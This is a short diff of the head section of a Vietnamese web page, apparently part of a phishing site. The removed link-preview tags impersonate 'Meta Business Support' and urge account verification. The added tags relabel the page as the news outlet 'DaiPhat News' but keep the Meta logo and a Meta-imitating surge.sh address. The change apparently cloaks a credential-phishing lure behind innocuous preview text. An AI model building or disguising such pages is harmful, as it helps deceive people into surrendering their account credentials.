--- a/index.html
+++ b/index.html
@@ -1,15 +1,16 @@
 <!DOCTYPE html>
 <html lang="vi">
 <head>
-<meta property="og:title" content="Meta Business Support" />
-<meta property="og:description" content="Please verify your Meta Business account to continue using the service." />
-<meta property="og:image" content="https://cdn.pixabay.com/photo/2021/12/14/22/29/meta-6871457_1280.png" />
-<meta property="og:url" content="https://verify-account-meta.surge.sh/" />
-<meta property="og:type" content="website" />
+  <!-- Open Graph tags -->
+  <meta property="og:title" content="Bản Tin Mới Nhất từ DaiPhat News" />
+  <meta property="og:description" content="Cập nhật tin tức nóng hổi trong ngày về chính sách, thể thao và thời tiết." />
+  <meta property="og:image" content="https://cdn.pixabay.com/photo/2021/12/14/22/29/meta-6871457_1280.png" />
+  <meta property="og:url" content="https://account-meta-supports.surge.sh/" />
+  <meta property="og:type" content="website" />
 
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Trang Tin Tức - DaiPhat News</title>
+  <title>Bản Tin Mới Nhất - DaiPhat News</title>
   <style>
     body {
       font-family: Arial, sans-serif;
